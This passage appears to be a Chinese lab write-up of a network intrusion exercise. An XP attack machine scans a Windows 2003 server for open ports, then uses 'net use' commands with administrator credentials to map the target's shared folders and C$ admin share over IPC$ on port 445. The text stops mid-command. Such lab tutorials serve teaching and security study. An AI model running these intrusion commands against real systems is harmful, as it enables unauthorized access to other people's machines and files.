没有人看,没有补图
背景:
攻击机 XP
肉鸡 2003 Server
IP设定 XP :10.1.1.1 /24
2003 :10.1.1.2/24
1.信息收集:
网段10.0.0.0 /24
利用扫描工具ScanPort 扫描端口
PS:使用Telnet 10.1.1.2 如果连接有效,可以使用 Telnet +IP地址+端口号 继续探测445 446 3389等常用接口
扫描之后,发现23,135,139,445,1026 端口开启,确认攻击目标。
2.漏洞利用:
445漏洞利用之一IPC$:
net use f: \\10.1.1.2\share 123.com /user:administrator
使用 f:(盘符,本地没使用过即可),映射这个地址的共享文件夹, 123.com/user:(用户名和密码可以不弹窗)
net use 映射哪些盘
net use f: \\10.1.1.2\share 密码 /user:用户名
net use f: \\10.1.1.2\c$ 密码 /user:用户名
net use f: \\10.1